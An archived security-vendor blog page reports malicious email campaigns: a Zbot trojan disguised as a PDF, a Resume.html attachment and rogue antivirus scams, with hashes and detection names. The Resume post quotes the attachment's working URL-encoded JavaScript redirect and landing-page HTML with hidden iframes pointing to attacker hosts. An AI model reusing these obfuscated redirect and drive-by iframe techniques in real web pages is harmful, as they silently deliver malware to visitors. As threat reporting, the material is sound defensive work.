Emal “Your document” contains trojan Trojan-Spy.Zbot


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Your document”, send from spoofed addresses and has the following ver short body:

To view your document, please open attachment.

The attached ZIP file has the name document_8608003.pdf.zip and contains the 196 kB large file c3.exe.

The trojan is known as Trojan-Spy.Zbot, W32/Risk.QSAW-8224, Luhe.Fiha.A or PE:Malware.FakePDF@CV!1.9C3A.

At the time of writing, 5 of the 54 AV engines did detect the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: b7e768d540e63e06139dc2dd194dda47b3a2712cb27b1d173127a7801ac88e88

Resume emails with attached file Resume.html leads to rogue AV software


MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE=”Javascript”><!–
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%
72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B
%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%
6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)
}
runit()
//–>
</script>

<SCRIPT LANGUAGE=”Javascript”><!–//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=”%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A”
xhtmldecode(x)}runit()//–></script>

When opening the attached HTML file you are directed to a web site witht he following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while so I guess that the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Malicious emails lead to rogue AV software antivirus_24.exe


MX Lab intercepted emails that leads to the rogue anti virus software with the executable antivurs_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps also other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.

When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>

We got the following screen below but I'm sure that on Windows it will be slightly different. Some Windows icons will be included of your hard drives and so on.

You will get to see some errors, your system is infected and the instructions lead you to download the malware. This part is obviously fake so please do not continue the process.

Virus Total permlink and MD5: 5be4b708a68687cb5490fe2caea49c82

MX Lab Summer Sales, only €8 per mailbox per year!


MX Lab is offering the Zero Hour Anti Virus and Managed Anti Spam for your mail server for € 8 per mailbox per year. For more information visit http://www.mxlab.eu/ and contact us.

Rogue online anti virus scanner Antivirus Plus


Antivirus Plus is a rogue anti virus scanner. When visiting an URL like hxxp://myreallyty.com/su/in.cgi?18 – something I don’t recommend to do at home – an online virus scanner is started to check your computer system. It won’t take long before the first viruses, malware and trojans are detected.

The online virus scanner gives you the warning that you have several infections: I-Worm.Sobig, TrojanDropper.JS.Mimail and Backdoor.SdBot.gen being one of the most critical infections according to Antivirus Plus.

 

Antivirus Plus will soon gives you the warning that it can’t clean your computer and offers you the option to download additional software to do so.

The file Installer_70137.exe is downloaded and is known as:

Win32:Trojan-gen (Avast)
Trojan.Win32.Agent2.gnf (F-Prot, Kaspersky)
TrojanDownloader:Win32/Renos.BAO (Microsoft)
Troj/FakeAV-NT (Sophos)

Virus Total permlink and MD5: 916e0f7aef7f1ea6308fa886d41ed750.

Rogue anti virus program: Antivirus for Windows – New 2009 Version


MX Lab intercepted a message that caught our attention. Some time ago, a rogue anti virus/anti spyware program known as Antivirus 2009, XP Antivirus Protection, MSAntivirus 2008 and Vista Antivirus 2008 was promoted on the internet and in various spam emails.

It seems that this now is distributed under a new name “Antivirus for Windows – New 2009 Version”.

The email was sent from PC Protection <internet.clientservice@gmail.com> and contains the subject “Update your Antivirus for Windows.

The email looks like a mailing and contains an Unsubscribe, Forward and Update Profile links. However, when looking at all the links in the message, some links are invalid like the Report Abuse link that contains an URL to http://ss25..sourcecompmail.com/ – note the double point after ss25. The domains http://ss25.sourcecompmail.com/ or http://sourcecompmail.com/ are giving us an HTTP 404 error and contains no web site. It is very common to work from under a subdomain and pages under that domain without any root HTML pages.

The domain itself appears to be registered at Tucows with the following details:

[whois.tucows.com]
Registrant:
 Quattro Web Solutions
 13 Hares avenue
 Woodstock
 Cape Town,  7925
 ZA

 Domain name: SOURCECOMPMAIL.COM

 Administrative Contact:
    Honig, Paul  paul@quattro.co.za
    15 Wandel street
    Gardens
    Cape Town
    Cape Town,  7925
    ZA
    +27.4480099    Fax: +27.214619277

 Technical Contact:
    Desk, Help  domreg@ns.com
    322 South Marietta Street
    ww
    w
    Gastonia, WI 28052
    US
    +1.7048527000    Fax: +1.7048849011

 Registrar of Record: TUCOWS, INC.
 Record last updated on 28-Oct-2008.
 Record expires on 28-Oct-2009.
 Record created on 28-Oct-2008.

 Registrar Domain Name Help Center:

http://domainhelp.tucows.com

 Domain servers in listed order:
    NS3.NITRIC.CO.ZA
    NS2.NITRIC.CO.ZA   

 Domain status: clientTransferProhibited
                clientUpdateProhibited

When following the download links, a landing page is shown:

When filling in your email address and the activation code you are presented with a payment screen.

Recommendation: do not proceed with the payment process and do not download the program.

MX Lab includes MX Lab Email Archiving & Back up service as a standard


MX Lab will offer the optional service MX Lab Email Archiving & Backup for free for each account on MX Lab AVAS Gateway or MX Lab Hosted Mail solution. This service will become available early March 2009 and the retention period for archived and stored emails will be 60 days.

Read the full press release.

Follow

Get every new post delivered to your Inbox.

Join 348 other followers